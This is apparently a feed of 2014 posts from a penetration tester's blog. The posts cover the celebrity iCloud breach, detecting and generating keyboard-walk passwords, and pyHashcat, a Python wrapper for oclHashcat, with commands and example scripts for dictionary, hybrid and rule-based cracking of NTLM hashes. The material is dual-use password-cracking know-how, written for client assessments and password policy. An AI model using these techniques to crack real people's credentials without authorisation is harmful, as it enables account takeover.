<p><a href="https://bytesdarkly.com/2014/09/pwkoscp-lessons-learned/">PWK/OSCP: Lessons Learned</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on September 19, 2014.</p>https://bytesdarkly.com/2014/09/pyhashcat-v0-5-beta-released2014-09-12T03:44:19-05:002014-09-12T03:44:19-05:00Richhttps://bytesdarkly.com
<p>pyHashcat v0.5 has been released on github. You can find it <a href="https://github.com/Rich5/pyHashcat">here</a>. If you’re not familiar with pyHashcat you can read a little about it <a href="http://bytesdarkly.com/2014/08/introducing-pyhashcat/">here</a>.</p>
<h4 id="new-features">New features:</h4>
<ul>
<li>Added support for hashcat via the HashcatWrapper class. Usage is similar to the oclHashcatWrapper class. See the README.txt</li>
<li>Support for new hash types added to oclHashcat v1.30</li>
<li>The get_restore_stats function has been re-written by Michael Sprecher (@hops_ch), and is now more stable</li>
<li>Added cpu_type to HashcatWrapper to use AVX/XOP binaries ( again thanks to Michael Sprecher)</li>
<li>Other small bug fixes and general code clean-up</li>
</ul>
<p>Enjoy! And of course let me know if/when bugs show up. It is a beta release after all 🙂</p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/09/pyhashcat-v0-5-beta-released/">pyHashcat v0.5 beta Released</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on September 12, 2014.</p>https://bytesdarkly.com/2014/09/sce-security-concepts-from-the-celebrity-icloud-hack2014-09-05T08:23:28-05:002014-09-05T08:23:28-05:00Richhttps://bytesdarkly.com
<h3 id="securityconcepts-explained"><em>Security Concepts Explained</em></h3>
<p><em>I have decided to start a routine blog post related to explaining security principals in a way that, hopefully, everyone should be able to understand. I’m calling these posts, Security For Grandma (SFG), because as I write these posts I’m going to try to explain topics in the same way that I would if my grandmother asked me to explain some “hacking thing” that showed up on the news. If you’re a seasoned security professional you’re welcome to continue reading of course, but please don’t be surprised by the simplicity of the topics.</em></p>
<p><em>Update: SFG has been renamed to Security Concepts Explained for clarity. The idea is the same.</em></p>
<p> </p>
<h2 id="celebrity-icloud-hack">Celebrity iCloud Hack</h2>
<p>In my first SFG post I’ll be talking about the compromise of hundreds of celebrity iCloud accounts resulting in the leak of many personal, and mostly embarrassing, photographs of some of our favorite stars. At this point I think most people are familiar with the headlines, but it you don’t know what I’m talking about take a minute to <a href="https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=&ie=UTF-8&q=celebrity%20hacking">Google “Celebrity Hacking”</a> and read a few news posts. Now, let’s address some terms that the media throws around without really explaining much of what they’re talking about.</p>
<h4 id="icloud"><em>iCloud</em></h4>
<p>What is this iCloud you speak of? While we’re on the subject what is this whole “cloud” thing anyway? In the most simple terms the “cloud”, these days, refers to a computer or collection of computers connected to the Internet where you store information. It’s a bit more complicated, but for the general public all you need to know is that it’s just another computer somewhere where your data is being kept so you can access it anywhere there is Internet access. For example, you’re writing a story on your home computer, and you want to read it on your phone later. So you save your story to a computer in the “cloud”, and then use your phone to retrieve it from the the remote computer you stored it on, and read it later at the airport.</p>
<p>Why is it called the “cloud”? Mostly out of laziness. In network engineering when you draw a diagram of how computers and systems are connected eventually you want to show how they’re connected to the broader Internet. Rather than worry about the details of the millions of systems on the Internet we just draw a big cloud and label it “Internet” or “World Wide Web”. Think about it this way, if you were drawing a map of your neighborhood, and you get to the point where your neighborhood connects to a major city; rather than draw every street in New York City, for example, you can just draw a big cloud picture and label it NYC – the details are unimportant in relation to your neighborhood map. Unfortunately, a simple icon used by engineers has become a marketing buzz word that is nebulous at best.</p>
<p>So the bottom line is the iCloud is just a bunch of computers owned by Apple where their customers can keep their files, music, and any picture that might be on their phone. iCloud a brand name; that’s all.</p>
<h4 id="brute-force-attack"><em>Brute-force Attack</em></h4>
<p>When you hear the phrase brute-force attack this is just a fancy way of saying they guessed some piece of information. In this case the attackers may have simply guessed the celebrities’ passwords. For example, let’s say we were trying to get into “John’s” account on Apple’s iCloud. In this case, we could “brute-force” our way into John’s account by going to the iCloud login screen and try different passwords until one worked. In practice human’s rarely do this by hand instead we use computer programs to try out thousands of passwords for us.</p>
<h4 id="two-step-authentication"><em>Two-step Authentication</em></h4>
<p>Sometimes you’ll see this called two-factor authentication or multi-factor authentication, but it’s referring to the same concept. The easiest way to describe two-factor authentication is to use an example. Let’s say you want to get into a secret building so you go to the door and knock. A man opens the door, and asks for the secret password. You tell him the correct password, but then he asks you to show him your “secret building” badge. Since you don’t have a badge the man doesn’t let you into the building. In this case you needed two things to get into the building – a secret password and a badge. Many online services like email or cloud storage now offer two-factor authentication as an option. For example, you can setup your gmail account to require that you enter both a password and a separate one-time use code that is sent to your phone. So you need to know your password, and have access to your phone in order to login to your email account. In other words, you need two-factors, something you know (password) and something you have (phone).</p>
<h3 id="my-take-on-the-attack">My Take on the Attack</h3>
<p>Now that the vocabulary is out of the way we can talk about the celebrity iCloud accounts that were hacked. Everyone is asking the same question- how did this happen? The short answer is that we don’t know yet. One theory is that attackers brute-forced the celebrity iCloud accounts. If this is true then both Apple and the celebrities are to blame, and here’s why. It is common practice to limit the amount of times you can attempt and fail to log into an account. Once you exceed the maximum login attempts many websites will freeze your account and/or not allow you to try to login for a set amount of time (e.g. 5 mins). If Apple did not limit login attempts then they failed at security on a very basic level allowing attackers to guess at passwords as many times as they want. However, the users of the iCloud accounts are also to blame in this case. I’m not going to discuss the wisdom of taking nude photos and trusting a third party (in this case Apple) to protect them, but a good rule is that you should pick strong passwords that have no connection to your life. If your dog’s name is “spot”, then <em>spot123</em> is not a good password. When guessing passwords it’s standard practice to make educated guesses by gathering information on your target, and there is A LOT of information readily available out there about celebrities. Another possible cause for the breach is that there is a problem with Apple’s iCloud. _<strong>Apple has completely denied this, and so far I have seen no evidence that this is the problem. </strong>_This scenario is far more scary because it means that there is very little users can do to help protect their data. In this case it’s up to Apple to fix the hole and plug it before more information is leaked.</p>
<p>So what can we do as users? The media keeps posting the following recommendations:</p>
<ol>
<li>
<p>Pick strong passwords that are at least 12 characters with a mix of numbers, upper and lower letters, and special characters (e.g !@#$%^&*())</p>
</li>
<li>
<p>Use two-factor authentication (instructions vary by account)</p>
</li>
</ol>
<p>These are good suggestions, but I’d like to add this one. Don’t use the verification questions to reset your password. On many sites if you forget your password you can fill in pre-answered questions to reset your password. Most verification questions are easily answered by looking up public records. For example, using a complex password like, qserqw34!@#$QWE$!@#$, does nothing to protect you if all I need to know is your mother’s maiden name to reset your password to whatever I want_. _</p>
<p>My final point is this – when you use the “cloud” you’re trusting someone else with your data. It’s no different than keeping your money in a bank rather than under your mattress. Protect your passwords like you would your ATM PIN. Choose who you trust with your personal information wisely, and be careful with what information you share. As a general rule just assume that all information on the cloud could one day become public knowledge.</p>
<p> </p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/09/sce-security-concepts-from-the-celebrity-icloud-hack/">SCE: Security concepts from the Celebrity iCloud hack</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on September 05, 2014.</p>https://bytesdarkly.com/2014/08/detecting-keyboard-walks-poc2014-08-19T05:02:55-05:002014-08-19T05:02:55-05:00Richhttps://bytesdarkly.com
<p> </p>
<h4 style="padding-left: 60px;">
Quick Links:
</h4>
<p style="padding-left: 60px;">
Repo: <a href="https://github.com/Rich5/Keyboard-Walk-Generators/tree/master/Analysis%20Tools">https://github.com/Rich5/Keyboard-Walk-Generators/tree/master/Analysis%20Tools</a>
</p>
<p> </p>
<p>At this point it feels a little like beating a dead horse, but I wanted to follow-up my previous post with an idea that occurred to me this weekend. I’ve been told that you shouldn’t pose a problem with at least outlining a few possible solutions, and I think this is a good rule for information security too. So with that in mind I wanted to show how you can use the tree walk data structure I previously presented to detect if users are trying to set a keyboard walk as a password. I’d like to point out that this technique is only presented as a proof of concept, but the methodology could probably be implemented on a domain wide scale to set a password policy preventing keyboard walks. I’m sure there are probably other ways to enforce this as well.</p>
<p>I’ve seen a wide range of password policies, and some of them are rather Draconian. For example, one system I worked on required a password that didn’t use any adjacent letters. This policy had the effect of annoying the users mostly, and still didn’t prevent all keyboard walks (e.g. z1x2c3v4). I’ve added a script <a href="https://github.com/Rich5/Keyboard-Walk-Generators/tree/master/Analysis%20Tools">here</a> that will use the <a href="https://github.com/Rich5/Keyboard-Walk-Generators/blob/master/Method%201%20-%20Tree%20Walks/qwerty_graph.txt">tree data structure</a> to detect if a keyboard walk is present in a string. This script isn’t perfect and detects strings that are walks in a technical sense, but maybe not exactly what you’re used to seeing. For example, running this script on the rockyou word list gives some interesting results. Here’s some sample output:</p>
<pre style="padding-left: 30px;"><code>
...
123456
654321
qwerty
121212
987654
456789
asdfgh
232323
212121
zxcvbn
098765
1q2w3e
234567
090909
454545
898989
565656
redred
qwaszx
567890
lololo
909090
...
</code></pre>
<p>You’ll notice that obvious walks like, <em>qwerty</em> and <em>123456</em> are detected, but also strings like 232323 which some may not consider a valid result. I would say that <em>232323</em> is a true positive, but what constitutes a keyboard walk is all in the eyes of the cracker I guess (i.e <em>redred</em> is questionable). Using the WalkCheck.py script I came up with a quick analysis of the rockyou word list.</p>
<p>Passwords containing walks of x length/total possible:</p>
<center>
<table>
<tr>
<td>
L
</td>
<td>
Total Walks
</td>
<td>
Total Possible*
</td>
<td>
Percentage
</td>
</tr>
<tr>
<td>
4
</td>
<td>
201345
</td>
<td>
14344005
</td>
<td>
1.4
</td>
</tr>
<tr>
<td>
5
</td>
<td>
72048
</td>
<td>
14341544
</td>
<td>
.5
</td>
</tr>
<tr>
<td>
6
</td>
<td>
34579
</td>
<td>
14323645
</td>
<td>
.2
</td>
</tr>
<tr>
<td>
7
</td>
<td>
16260
</td>
<td>
14064476
</td>
<td>
.1
</td>
</tr>
<tr>
<td>
8
</td>
<td>
10904
</td>
<td>
12116679
</td>
<td>
.1
</td>
</tr>
</table>
</center>
<p>*Total possible means candidates of at least length L</p>
<p> </p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/08/detecting-keyboard-walks-poc/">Detecting Keyboard Walks: POC</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on August 19, 2014.</p>https://bytesdarkly.com/2014/08/generating-keyboard-walks2014-08-14T06:55:58-05:002014-08-14T06:55:58-05:00Richhttps://bytesdarkly.com
<p><em>This is a companion blog post to my talk last month at NoVAH on two methods I used to generate keyboard walks for password cracking.</em></p>
<h4 style="text-align: justify; padding-left: 60px;">
Quick Links:
</h4>
<p style="text-align: justify; padding-left: 60px;">
Main repo: <a href="https://github.com/Rich5/Keyboard-Walk-Generators">https://github.com/Rich5/Keyboard-Walk-Generators</a>
</p>
<p> </p>
<h1 id="motivation">Motivation</h1>
<p>A somewhat common trend is to use keyboard walks in an effort to produce complex passwords. This isn’t a new trend by any means, but I have noticed a lot more walks showing up in Mimikatz outputs lately. My theory is that complex password policies are actually encouraging some users to use walks, and who can blame them really? If the policy states that you must have a password at least 12 characters, comprised of upper and lower case letters, and include numbers and special characters then keyboard walks are an easy solution. My goal was to show my clients that using keyboard walks is not a good security practice, and that they can easily be cracked with a simple dictionary attack; however, the problem I ran into was that finding a good word list wasn’t as easy as I thought. To be clear, I did find a few lists and generator scripts, but they often missed what I considered to be common walks. So in the end (and to my own dismay) I decided to generate my own list of keyboard walks. If you’re in a rush and just looking for the solutions I used then jump down to the “Methods” sections of this post.</p>
<p>NOTE: For my purposes I needed a list generated from the qwerty english keyboard although the methods outlined below can be used for other layouts.</p>
<p> </p>
<h1 id="background">Background</h1>
<p>When I’m referring to keyboard walks what I really mean is using visual patterns on the keyboard to generate strings. Just to get everyone on the same page let’s first take a look at a few examples.</p>
<p> <figure id="attachment_47" style="width: 765px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/08/kb_walk1.png"><img class="wp-image-47" src="/images/2014/08/kb_walk1-1024x259.png" alt="kb_walk1" width="765" height="193" srcset="/images/2014/08/kb_walk1-1024x259.png 1024w, /images/2014/08/kb_walk1-300x76.png 300w, /images/2014/08/kb_walk1.png 1050w" sizes="(max-width: 765px) 100vw, 765px" /></a></p>
<p> <figure id="attachment_51" style="width: 765px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/08/kb_walk21.png"><img class="wp-image-51" src="/images/2014/08/kb_walk21-1024x262.png" alt="" width="765" height="196" srcset="/images/2014/08/kb_walk21-1024x262.png 1024w, /images/2014/08/kb_walk21-300x76.png 300w, /images/2014/08/kb_walk21.png 1043w" sizes="(max-width: 765px) 100vw, 765px" /></a></p>
<p> <figure id="attachment_46" style="width: 786px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/08/kb_walk3.png"><img class="wp-image-46" src="/images/2014/08/kb_walk3-1024x262.png" alt="kb_walk3" width="786" height="201" srcset="/images/2014/08/kb_walk3-1024x262.png 1024w, /images/2014/08/kb_walk3-300x76.png 300w, /images/2014/08/kb_walk3.png 1050w" sizes="(max-width: 786px) 100vw, 786px" /></a></p>
<p> </p>
<p>One of the main problems that struck me when I started this project is how do you programmatically “know” which keys are next to one another? The qwerty keyboard was basically created through trial-and-error to prevent typewriter hammers from getting stuck together; other than that there really isn’t any rhyme or reason to the layout. The rest of this post describes two methods that I used to generate keyboard walks. Method 1 is more academic whereas Method 2 is more practical for password cracking.</p>
<h2 id="method-1-tree-walks">Method 1: Tree Walks</h2>
<h3 id="steps">Steps:</h3>
<ol>
<li>Create directed graph representing the qwerty keyboard</li>
<li>Walk the graph using a modified Depth-limited search (DLS) recording each path</li>
</ol>
<p> </p>
<p>To create a directed graph data structure, unfortunately, I had to type one out by hand. The entire data structure is a python dictionary of dictionaries where each node is a letter that acts as the outer dictionary key, and edges are keys to the inner dictionary. A small example of one letter is shown below:</p>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'S': {'diag_down_left': 'z',
'diag_down_right': 'c',
'diag_up_left': 'q',
'diag_up_right': 'e',
'down': 'x',
'left': 'a',
'loop': 'S',
'right': 'd',
'shift_diag_down_left': 'Z',
'shift_diag_down_right': 'C',
'shift_diag_up_left': 'Q',
'shift_diag_up_right': 'E',
'shift_down': 'X',
'shift_left': 'A',
'shift_loop': 's',
'shift_right': 'D',
'shift_up': 'W',
'up': 'w'},
</code></pre></div></div>
<p> </p>
<p>You can see the entire data structure at <a href="https://github.com/Rich5/Keyboard-Walk-Generators/blob/master/Method%201%20-%20Tree%20Walks/qwerty_graph.txt">https://github.com/Rich5/Keyboard-Walk-Generators/blob/master/Method%201%20-%20Tree%20Walks/qwerty_graph.txt</a></p>
<p>Once I had a data structure to parse I used a modified DLS to walk the tree and record the path along the way. Below is the pseudo code for walking the tree.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TARGET_DEPTH = X
for each node in graph {
path = “”
depth = 0
DLS(node, depth, path)
}
DLS(node, depth, path){
path.push(node[value])
if depth &gt;= TARGET_DEPTH {
print path
} else {
depth = depth + 1
for each edge on node {
DLS(graph[edge], depth, path)
path.pop()
}
}
}
</code></pre></div></div>
<p>Here’s a quick visual demo of what this algorithm is doing</p>
<p><a href="/images/2014/08/output_TFHQE5.gif"><img class="alignnone size-full wp-image-58" src="/images/2014/08/output_TFHQE5.gif" alt="output_TFHQE5" width="800" height="450" /></a></p>
<p>All source files for this method can be found on github. QwertyTreeWalker.py takes the following arguments:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>usage: QwertyTreeWalker.py [-h] [-l [L]] [-p [P]] [-x] [-H] [--stdout]
[--noplain]
[file_name]
Generate walks for Qwerty Keyboard
positional arguments:
file_name File with adjacency list of format {'letter':
{'direction': 'letter connected'}}
optional arguments:
-h, --help show this help message and exit
-l [L], -length [L] Walk length
-p [P], -processes [P]
Number of processes to divide work
-x, -exclude Will trigger prompt for link exclude list
-H, -hash Output NTLM hash for testing
--stdout Output to screen
--noplain Do not print plain text hash
</code></pre></div></div>
<p>Running the following command:</p>
<p style="padding-left: 30px;">
python QwertyTreeWalker.py qwerty_graph.txt -l 16 -p 8
</p>
<p>will bring up an interactive prompt similar to what’s shown below</p>
<p><a href="/images/2014/08/method1_output.png"><img class="alignnone size-large wp-image-40" src="/images/2014/08/method1_output-1024x334.png" alt="method1_output" width="640" height="208" srcset="/images/2014/08/method1_output-1024x334.png 1024w, /images/2014/08/method1_output-300x98.png 300w, /images/2014/08/method1_output.png 1092w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p>Running in default mode the tree walker script will generate one or more output files containing keyboard walks for each process. If you would like to print to stdout then use the –stdout command line argument.</p>
<p>One major thing to note here is the shear number of walks that would be produced by this method. In fact, on the system I ran the above command the script would not finish in my lifetime. Even generating walks of length 8 would take more than a month. Here are some quick calculations on run times based on walk length.</p>
<p> </p>
<center>
<table>
<tr>
<td>
L
</td>
<td>
Total Walks
</td>
<td>
Estimated Time (avg 15K walks/s)*
</td>
</tr>
<tr>
<td>
4
</td>
<td>
548,208
</td>
<td>
~1 min
</td>
</tr>
<tr>
<td>
5
</td>
<td>
9,867,739
</td>
<td>
~ 10 min
</td>
</tr>
<tr>
<td>
6
</td>
<td>
177,619,388
</td>
<td>
~3.2 hrs
</td>
</tr>
<tr>
<td>
7
</td>
<td>
3,197,149,049
</td>
<td>
~2.5 days
</td>
</tr>
<tr>
<td>
8
</td>
<td>
57,548,683,002
</td>
<td>
~44 days
</td>
</tr>
<tr>
<td>
16
</td>
<td>
6.3418422e+20
</td>
<td>
way too long!!
</td>
</tr>
</table>
</center>
<h6 id="using-8-processes-on-intel-i7-2600--340ghz">*Using 8 processes on Intel i7-2600 @ 3.40GHz</h6>
<p>I tried pruning the tree to get the run times down, but it was still taking way too long for my purposes. Even though Method 1 was interesting, since I wanted a word list up to length 16 obviously this wouldn’t work. So after making some assumptions about how real users would create keyboard walks I ended up using Method 2 for all practical purposes.</p>
<h2 id="method-2-combinator-script">Method 2: Combinator Script</h2>
<h3 id="steps-1">Steps:</h3>
<ol>
<li>Create a “seed file” of small qwerty walks</li>
<li>Combined contents of seed file with itself to generate longer walks</li>
<li>Use mutation rules to make up for any missed walks</li>
</ol>
<p>The “seed file” I created was just a simple list of 4 character walks that I hand typed. I tried to come up with all the walks that I would possibly use based on the keyboard layout. I then combined the seed file with itself to generate 8 character walks, and again to get 16 character walks. I purposely made my seed file simple knowing that I was going to use a ruleset to make up for the missed characters. Below is an overview of the process.</p>
<p> </p>
<p><a href="/images/2014/08/method2.png"><img class="alignnone wp-image-41" src="/images/2014/08/method2.png" alt="method2" width="567" height="360" srcset="/images/2014/08/method2.png 780w, /images/2014/08/method2-300x190.png 300w" sizes="(max-width: 567px) 100vw, 567px" /></a></p>
<p> </p>
<p>Again all the source files can be found on github. I found the best results are to use the following commands to generate a 5GB file.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> python Combinator.py 4_Walk_seed.txt -l 8 > 8_Walk.txt<br /> python Combinator.py 8_Walk.txt -l 16 > 16_Walk.txt
</code></pre></div></div>
<p>You can then input the 16_Walk.txt file into your favorite password cracker with the companion rules file.</p>
<p> </p>
<h2 id="final-thoughts">Final Thoughts</h2>
<p>While interesting, Method 1 turned out to be more of an academic exercise. Method 2 turned out to work better than I thought for several reasons. One, I believe that this word list will crack a majority of the most commonly used walks. Two, the travel footprint is very small. The seed file, combinator script, and rules file combined are less than 4KB. It only takes 5 minutes to generate a 5GB file which means that I don’t have to carry around another massive dictionary on remote engagements. Finally, it turns out that Method 2 catches walks that Method 1 won’t. Method 1 assumes that walks only use adjacent keys, but in reality users will try to get creative and jump from one column or row to another. As always I hope someone finds this useful. Let me know if you have any questions.</p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/08/generating-keyboard-walks/">Generating Keyboard Walks</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on August 14, 2014.</p>https://bytesdarkly.com/2014/08/introducing-pyhashcat2014-08-06T11:17:07-05:002014-08-06T11:17:07-05:00Richhttps://bytesdarkly.com
<p>NOTE: This is a cross post from my article on www.sploitmonkey.com></p>
<p>By far my favorite password cracking tool is oclHashcat. It’s extremely fast, easy to use, and provides nearly every feature that I want in a password cracker. If I have GPU cycles available I’ll use oclHashcat otherwise I’ll use hashcat (CPU based) or john. On a recent project I needed to be able to easily manage a lot of captured hashes and try them out against multiple attack methods such as dictionary, hybrid, and markov chains to name a few. oclHashcat supports all of these attack methods (and more!), but what I wanted was a system that would automate my password cracking tasks and managed captured credentials.</p>
<p>My first thought was to just use a collection of bash scripts to feed input into oclHashcat. Many people use this technique and I’m sure it gets the job done, but I wanted something more robust. I wanted a system that I could easily feed input into oclHashcat, and return output in a format of my choosing to be parsed and organized. My general purpose language of choice is Python so I set out writing a password cracking system to my requirements; however, along the way ran into some issues interfacing with oclHashcat. As of this writing oclHashcat does not have an API, to speak of, so in order to interface with the program you have to use standard streams or read and write to the various input/output files available. Using Python to interface with streams is easy enough, but I wanted a simple interface to oclHashcat without worrying about creating command line arguments, creating new processes, or converting output to Python data structures. The solution I came up with is a small Python module that acts as a simple wrapper to oclHashcat.</p>
<p>The pyHashcat 0.02 beta module is <a href="https://github.com/Rich5/pyHashcat">available on GitHub</a> and is released under the MIT License. The main idea is to make interfacing with oclHashcat as easy as writing Python scripts.</p>
<p>List of features:</p>
<ul>
<li>Interface with oclHashcat as a Python object</li>
<li>Run oclHashcat as a background process</li>
<li>Automatically builds command line arguments based on Python object variable assignment</li>
<li>Support for stdout stream gobbling</li>
<li>Support for stderr stream gobbling</li>
<li>Parse output from oclHashcat files and return data as a Python dictionary data structure with user defined fields</li>
<li>Parse restore files and return data as a Python dictionary data structure</li>
<li>Wrapper class has context manager (i.e. with) that will automatically clean-up oclHashcat background process on object termination</li>
<li>Look-up function for mapping hash types to oclHashcat type codes</li>
</ul>
<p>Below are a few examples of what it looks like to use pyHashcat. It runs without output by default, but setting verbose mode will generate input for debugging. It’s beta right now so if you run into any bugs please let me know.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> '''
From: cudaExample0.cmd using Python context manager
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.hash_file = "example0.hash"
hashcat.markov_threshold = 32
hashcat.words_files.append("example.dict")
hashcat.mask = "?a?a?a?a"
hashcat.hybrid_mask_dict()
while hashcat.is_running():
print hashcat.stdout() # Simple Stream gobbler
</code></pre></div></div>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'''
From: cudaExample0.cmd without context manager
'''
import pyHashcat&lt
hashcat = pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='ocl', verbose=True)
hashcat.hash_file = "example0.hash"
hashcat.markov_threshold = 32
hashcat.words_files.append("example.dict")
hashcat.mask = "?a?a?a?a"
hashcat.hybrid_mask_dict()
while hashcat.is_running():
print hashcat.stdout()
hashcat.stop()
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
'''
From: Hybrid-Dictionary attack
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.hash_file = "example0.hash"
hashcat.markov_threshold = 32
hashcat.words_files.append("example.dict")
hashcat.mask = "?a?a?a?a"
hashcat.hybrid_dict_mask()
while hashcat.is_running():
print hashcat.stdout() # Simple Stream gobbler
</code></pre></div></div>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> '''
Example with rules
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.words_files.append("example.dict")
hashcat.rules_files.append("best42.rule")
hashcat.rules_files.append("custom.rule")
hashcat.hash_type = "NTLM"
hashcat.straight()
while hashcat.is_running():
print hashcat.stdout() # Simple Stream gobbler
</code></pre></div></div>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> '''
Test example
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.words_files.append("example.dict")
hashcat.rules_files.append("best42.rule")
hashcat.rules_files.append("custom.rule")
hashcat.hash_type = "NTLM"
hashcat.straight(TEST=True) # Will print stdin arguments without starting process
</code></pre></div></div>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
'''
Using the start function
NOTE: start function does not support the TEST option
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.start(argv=["-m", "1000", "-a", "0", "..\\hashes.hash", "dictionary.dict", "-r", "myrules.rule"])
while hashcat.is_running():
print hashcat.stdout()
</code></pre></div></div>
<p> </p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
'''
Parse outfile example
'''
import pyHashcat
with pyHashcat.oclHashcatWrapper(path_to_exe, gcard_type='cuda', verbose=True) as hashcat:
hashcat.words_files.append("example.dict")
hashcat.rules_files.append("best42.rule")
hashcat.rules_files.append("custom.rule")
hashcat.hash_type = "NTLM"
hashcat.outfile = "myoutput.txt"
hashcat.straight()
while hashcat.is_running():
pass
print hashcat.get_hashes(fields=('first', 'second', 'third'))
</code></pre></div></div>
<p><a href="https://bytesdarkly.com/2014/08/introducing-pyhashcat/">Introducing pyHashcat</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on August 06, 2014.</p>